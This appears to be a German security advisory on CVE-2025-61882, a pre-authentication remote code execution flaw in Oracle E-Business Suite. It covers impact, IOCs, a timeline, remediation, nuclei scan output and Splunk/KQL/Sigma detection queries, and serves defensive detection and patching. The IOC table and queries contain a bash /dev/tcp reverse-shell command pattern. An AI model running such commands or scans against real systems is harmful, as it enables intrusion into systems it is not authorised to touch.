
Bietet ein detailliertes CVE-2025-61882-Advisory mit technischer Analyse, IOCs, Erkennungsabfragen und einer nuclei-basierten Exploit-Vorlage für die Pre-Auth-RCE in Oracle E-Business Suite.
Kurzzusammenfassung: Kritische Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) — betrifft 12.2.3 → 12.2.14, CVSS 9.8, aktiv in freier Wildbahn ausgenutzt (Ransom-/Erpressungsaktivitäten gemeldet). ([oracle.com][1])
| Feld | Details |
|---|
| 🆔 CVE | CVE‑2025‑61882 |
| 🧾 Produkt / Komponente | Oracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher Integration |
| 📦 Betroffene Versionen | 12.2.3 → 12.2.14 |
| 🔢 CVSS (v3.1) | 9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H) |
| ⚠️ Typ | Remote Code Execution (RCE) — keine Authentifizierung erforderlich |
| 🔥 In freier Wildbahn ausgenutzt | Ja — Massenausnutzung / Erpressungskampagnen gemeldet |
| 📅 Offenlegung / Zeitplan | Oktober 2025 (Herstellerhinweis + öffentliche Writeups). ([oracle.com][1]) |
(Oben konsolidiert aus Herstellerhinweis, NVD/CISA und mehreren Herstelleranalysen.) ([oracle.com][1])
| Auswirkungsbereich | Was es bedeutet |
|---|---|
| 🔓 Vertraulichkeit | Angreifer können sensible HR-/Finanz-/ERP-Daten lesen |
| 🛠️ Integrität | Angreifer können Datensätze ändern, Backdoors erstellen oder Konfigurationen verändern |
| ⚡ Verfügbarkeit | Angreifer können Dienste stören, Ransomware ausführen oder Backups zerstören |
| 🧭 Risikostufe | Extrem — Pre‑Auth RCE auf kritischem ERP-System → mögliche vollständige Domain-Übernahme |
Referenzen, die hochriskante Ausnutzung und Ransomware-Verbindungen melden. ([Rapid7][2])
Oracle und Incident-Responder haben IOCs veröffentlicht; unten sind repräsentative Beispiele aus Hinweisen und Hersteller-Writeups. Suchen Sie in Logs und Endpunkten nach diesen Mustern. ([oracle.com][1])
| Typ | Beispiel |
|---|---|
| 🌐 IPs (beobachtet) | 200.107.207.26, 185.181.60.11 (beispielhafte gemeldete Adressen) |
| 🧾 Befehlsmuster | sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (Reverse Shell) |
| 🗂️ Datei-Hashes | Mehrere SHA‑256-Hashes für vermutete Exploit-Skripte (vollständige Liste im Herstellerhinweis) |
| 🕳️ Artefakte | Unerwartete Web-Shells, neue Cronjobs, verdächtige ausgehende Verbindungen zu ungewöhnlichen IPs/Ports |
Wenn Sie die vollständige IOC-Liste (IPs, vollständige Hashes, Dateinamen) möchten, kann ich sie hier einfügen — sagen Sie „IOCs einfügen“. (Keine Links.)
| Datum | Ereignis |
|---|---|
| 9. Aug. 2025 | Früheste gemeldete reale Ausnutzungsaktivität (Hersteller-Telemetrie). ([crowdstrike.com][4]) |
| Anfang Okt. 2025 | Oracle hat Sicherheitshinweis / Patch-Verfügbarkeit für EBS herausgegeben. ([oracle.com][1]) |
| 6.–7. Okt. 2025 | CISA hat die CVE in ihren Katalog bekannter ausgenutzter Schwachstellen (KEV) aufgenommen (Leitfaden für Bundesbehörden, Frist für Maßnahmen). ([cisa.gov][5]) |
| Okt. 2025 (laufend) | Mehrere Hersteller-Writeups und Massenexploit-Berichte (CrowdStrike, Rapid7, Tenable usw.). ([crowdstrike.com][4]) |
| Priorität | Aktion | Hinweise / Beispiel-Details |
|---|---|---|
| 1️⃣ Kritisch | Patchen betroffener EBS-Instanzen | Oracle-Sicherheitshinweis-Patches für Versionen 12.2.3–12.2.14 sofort anwenden. ([oracle.com][1]) |
| 2️⃣ Hoch | Isolieren / Einschränken des Zugriffs auf EBS-Web-Endpunkte | Internetzugängliches HTTP/HTTPS zu EBS blockieren; nur vertrauenswürdige Admin-IPs oder VPN zulassen. |
| 3️⃣ Hoch | WAF-Regeln aktivieren/anpassen | Hersteller-/Community-WAF-Signaturen für die Exploit-Muster bereitstellen; verdächtige Payloads blockieren. ([Rapid7][2]) |
| 4️⃣ Hoch | Jagen & erkennen | Logs nach Reverse-Shell-Befehlen, abnormalen Dateischreibvorgängen und ausgehenden Verbindungen zu IOCs durchsuchen. |
| 5️⃣ Vorfall | Eindämmen & reagieren, wenn Kompromittierung gefunden | Host isolieren, forensische Beweise sichern, Zugangsdaten ändern, aus sauberen Backups neu aufbauen. |
| 6️⃣ Richtlinie | Melden & benachrichtigen | Wenn regulatorische/vertragliche Anforderungen gelten, Interessengruppen und Behörden gemäß Richtlinie benachrichtigen (CISA/KEV-Leitfaden kann gelten). ([nvd.nist.gov][3]) |
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.


Splunk (Suche nach Reverse-Shell-Muster):
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
ELK / Kibana (KQL):
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
Sigma-Regel (konzeptionell):
title: Oracle EBS Reverse Shell via HTTP
detection:
selection:
EventID: 1234
ProcessCommandLine|contains: "/dev/tcp/"
condition: selection
(Feldnamen an Ihr Log-Schema anpassen; IOCs zur Verfeinerung verwenden.)
80/443-Verkehr zu EBS-Servern aus dem öffentlichen Internet blockieren; nur Management-VPN und bestimmte Admin-IPs zulassen.bash -i, /dev/tcp/, base64 -d oder typische Exploit-Payload-Muster in POST-Bodys oder URL-Parametern enthalten.(Ich liste Quellen für Genauigkeit — ich füge hier keine Links ein, aber dies sind die Hersteller-/Behördennamen, auf die Sie bei Bedarf verweisen können.)
Die in diesem Bericht bereitgestellten Informationen dienen nur der Sensibilisierung, Verteidigung und Bildung. Die Verwendung dieser Informationen zum Ausnutzen, Angreifen oder Kompromittieren eines Systems ohne ausdrückliche Genehmigung ist illegal und kann zu straf- und zivilrechtlichen Sanktionen führen.
🔒 Wenden Sie immer empfohlene Patches an, befolgen Sie Sicherheits-Best-Practices und führen Sie Tests nur in kontrollierten Umgebungen durch.
🧾 Dieser Bericht ersetzt keine offiziellen Herstellerhinweise — konsultieren Sie immer Oracle-Sicherheitshinweise und autorisierte Anleitungen für verbindliche Behebungsanweisungen.